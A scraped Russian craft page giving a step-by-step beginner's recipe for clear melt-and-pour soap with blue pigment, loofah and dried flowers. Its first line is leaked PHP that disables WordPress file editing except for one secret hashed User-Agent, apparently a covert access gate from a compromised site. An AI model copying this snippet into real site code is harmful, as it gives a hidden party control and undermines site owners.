if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Урок домашнего мыловарения для начинающих | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Урок домашнего мыловарения для начинающих

Неограниченное количество рецептов по изготовлению мыла своими руками многих творческих людей с подвигло на то чтобы попробовать себя в роли мыловара. Ведь так приятно уметь делать все, превращать даже обыденное средство гигиены в оригинальный шедевр.

Неогра­ни­чен­ное коли­че­ство рецеп­тов по изго­тов­ле­нию мыла сво­и­ми рука­ми мно­гих твор­че­ских людей с подвиг­ло на то что­бы попро­бо­вать себя в роли мыло­ва­ра. Ведь так при­ят­но уметь делать все, пре­вра­щать даже обы­ден­ное сред­ство гиги­е­ны в ори­ги­наль­ный шедевр.

В сво­ем оче­ред­ном мастер клас­се по домаш­не­му мыло­ва­ре­нию для начи­на­ю­щих я рас­ска­жу вам рецепт состо­я­щий из базо­во­го набо­ра ком­по­нен­тов. Для это­го мыла нам пона­до­бят­ся сле­ду­ю­щие ингредиенты:

  • Про­зрач­ная мыль­ная основа
  • Мас­ла (под­хо­дят как эфир­ные так и косметические)
  • Люфа и сухие цветы
  •  Гидролаты
  • Отдуш­ка, ароматизатор
  • Кра­ся­щие пиг­мен­ты сине­го цвета
  • Фор­моч­ка для гото­во­го мыла
  • Вен­чик и дере­вян­ная ложка
  • Весы

фото ингр

 

Если вы пока не зна­е­те где взять нуж­ные ком­по­нен­ты – посе­ти­те мага­зи­ны для мыло­ва­ров, или же най­ди­те их в интер­нет магазинах.

Запа­си­тесь твор­че­ским настро­е­ни­ем, и може­те при­сту­пать к изго­тов­ле­нию мыла в домаш­них условиях!

Шаг 1

Возь­ми­те 100 грамм твер­дой мыль­ной осно­вы и измель­чи­те ножом на неболь­шие кусоч­ки, это облег­ча­ет про­цесс топ­ки в мик­ро­вол­но­вой печи (мож­но исполь­зо­вать и духо­вой шкаф, глав­ное не пре­вы­шать температуру).

1

Шаг 2

Уста­но­вив тем­пе­ра­ту­ру в 60 гра­ду­сов, поме­сти­те емкость с мыль­ной осно­вой в мик­ро­вол­нов­ку. Мож­но рас­то­пить и на водя­ной бане, но тогда вы не смо­же­те сле­дить за тем­пе­ра­ту­рой осно­вы. В любом слу­чае, глав­ное, что­бы осно­ва не заки­пе­ла, ина­че мыло из нее не выйдет.

2

Шаг 3

Когда осно­ва пол­но­стью рас­то­пить­ся, про­верь­те что­бы не оста­лось комоч­ков (их лег­ко мож­но раз­мять дере­вян­ной лож­кой) и пере­хо­ди­те к сле­ду­ю­ще­му эта­пу — добавь­те эфир­ные мас­ла в коли­че­стве 1\3 чай­ной лож­ки. Аро­ма­ти­за­то­ры мож­но доба­вить вме­сте с мас­ла­ми, но я реко­мен­дую их добав­лять в самый послед­ний момент – так сохра­нить­ся вся интен­сив­ность запаха.

3

Шаг 4

Пере­хо­дим к окрас­ке мыль­ной осно­вы пиг­мен­том, в моем слу­чае сине­го цве­та. При жела­нии мож­но кра­сить пище­вы­ми кра­си­те­ля­ми, так как они более без­опас­ны, но насы­щен­ность цве­та про­дер­жит­ся не дол­го. Ста­рай­тесь не пере­усерд­ство­вать с окрас­кой, ина­че от мыла в даль­ней­шем могут оста­вать­ся поло­сы на коже – 10 капель на 100 грамм будет достаточно.

4

Шаг 5

При помо­щи вен­чи­ка (мож­но вос­поль­зо­вать­ся мик­се­ром, но на самой малень­кой ско­ро­сти) тща­тель­но пере­ме­ши­ва­ем полу­чив­шу­ю­ся мас­су, и после это­го добав­ля­ем отдушку.

5

Шаг 6

Раз­ли­ва­ем мыло по фор­моч­кам любо­го раз­ме­ра, мож­но вылить в одну фор­му, а после того как засты­нет раз­ре­зать на малень­кие брус­ки. Сбрыз­не­те спир­том или спе­ци­аль­ной жид­ко­стью, что­бы мыло не пузы­ри­лось при затвердении.

6

И оставь­те засты­вать при­мер­но на 24 часа, в зави­си­мо­сти от раз­ме­ра формочек.

Шаг 7

Достань­те мыло из фор­мо­чек и може­те при­сту­пать к его исполь­зо­ва­нию! Но для любо­го мыла изго­тов­лен­но­го в домаш­них усло­ви­ях после пол­но­го засы­ха­ния жела­тель­но дать ему еще 2 дня окреп­нуть, и толь­ко после поль­зо­вать­ся им.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Katerinka666

Люблю все творческое и считаю что нет цены тому, что сделано своими руками! С удовольствием делюсь своими мастер-классами и пользуюсь чужими для совершенствования своих навыков! Читайте все мои записи!